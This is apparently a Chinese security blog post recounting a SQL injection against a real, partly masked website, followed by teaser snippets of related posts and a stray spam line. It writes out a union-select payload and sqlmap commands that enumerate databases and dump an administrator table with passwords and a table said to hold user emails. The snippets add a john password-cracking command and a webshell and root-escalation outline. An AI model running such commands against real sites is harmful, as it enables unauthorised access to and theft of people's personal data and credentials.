<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    某網站純在SQl注入利用漏洞

    VSole2021-09-28 08:00:37

    1.單引號返回物理路徑

    2.猜解當前表的列數,16列正確并正常返回,17列返回異常

    3.結合union select語句,

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 --+返回3和7,并在圖片里面返回12

    4.查看其數據庫名和數據庫版本:

    5.使用sqlmap工具

    1)爆出其所有庫

    sqlmap -u "http://******.com/content.php?id=268" –dbs

    2)爆出*******2_db庫的所有表

    sqlmap -u "http://******.com/content.php?id=268" -D *******2_db –tables

    3)爆出administrator表的所有列和數據

    sqlmap -u "http://******.com/content.php?id=268" -D *******2_db -T administrator --column

    sqlmap -u "http://******.com/content.php?id=268" -D *******2_db -T administrator C AddTime,AdminID,AdminName,AdminPassword,ID,isFrozen,LoginTime,UpdateTime -dump

    4)再試著爆出enews表的所有列和數據

    此表存在2017-2020年用戶郵箱數據等敏感信息

    另:以上此網站所有表都可使用sqlmap工具得到一些數據信息,在此不一一列舉了。

    總結:

    漏洞可能造成的危害:

    1)攻擊者未經授權可以訪問數據庫中的數據,盜取用戶的隱私以及個人信息,造成用戶的信息泄露。

    2)可以對數據庫的數據進行增加或刪除操作,例如私自添加或刪除管理員賬號。

    3)如果網站目錄存在寫入權限,可以寫入網頁木馬。攻擊者進而可以對網頁進行篡改,發布一些違法信息等。

    4)經過提權等步驟,服務器最高權限被攻擊者獲取。攻擊者可以遠程控制服務器,安裝后門,得以修改或控制操作系統。

    修復建議:

    1)使用waf過濾敏感字段,例如mysql函數。

    2)建議提交的url是否存在可控字段,若用戶修改參數則自動跳轉到某頁面。

    sql注入sqlmap
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    01登錄框存在sql注入:通過前期的信息搜集,發現站點使用thinkphp3.2版本的框架,在登錄頁面驗證存
    發現漏洞七月正值暑假,閑暇時光在百度上inurl一番,找到了一個古老的企業OA系統IP站點,沒有域名,掃過一眼,.NET流行時代的普遍漏洞浮現在腦海里——SQL注入在用戶名里輸入admin’,不負期望地報了錯很明顯,前后端都沒有對用戶的輸入進行過濾,直接將’帶入了SQL語句進行。初步判斷,此OA系統存在SQL注入漏洞。漏洞驗證打開BurpSuite,設置好瀏覽器代理,抓下HTTP請求,一氣呵成。
    option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27單引號嘗試:存在sql注入sqlmap 走起!跑數據 格式有點問題。獲取到管理員加密后的密碼$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 來破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登錄后臺3x0:后臺篇在后臺查找一番發現 類似于模板的頁面可以利用模板的信息在結合上面的端口信息沒有ssh應該是從web端進入 webshell?就接著用了4x0:提權篇查看系統的內核版本啟動kali上的apache,把exp上傳到服務器把exp下載到靶機解壓exp授權腳本使用exp報錯不影響使用獲取到root權限5x0:flag獲得
    記一次SQLmap實戰
    2021-09-28 07:41:13
    簡介:sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發現并利用給定的URL的SQL注入漏洞,目
    一些重要的SQLMap命令
    2023-05-04 08:55:08
    從掃描SQL注入漏洞到獲取數據庫名字、表和列,以及獲得系統訪問權限,其可被用于多種目的。我們必須給SQLMap提供有效的cookie才能對登錄頁面的POST請求進行掃描。不過別總是保持一個較高的值,因為可能會影響結果的準確性。默認情況下值為1,最高可以設置為3。值為3時,就是最大值,包含了一些嚴重的SQL查詢。級別指定要執行的檢查或payload的數量。
    本靶機難度為高難度,涉及到了緩沖區溢出的源碼審計 ,逆向分析,動態調試等漏洞技能點,攻擊方法有2種:??SQL 注入得到的密碼可以保留。
    前段時間參加攻防演練的時候,發現目標系統有很多都使用了用友的產品,故整理一篇關于用友漏洞的文章。
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    vulnhub之Mercury的實踐
    2022-11-30 10:31:40
    今天實踐的是vulnhub的Mercury鏡像,下載地址,https://download.vulnhub.
    滲透測試很多時候需要的細心和耐心再加上一點運氣
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类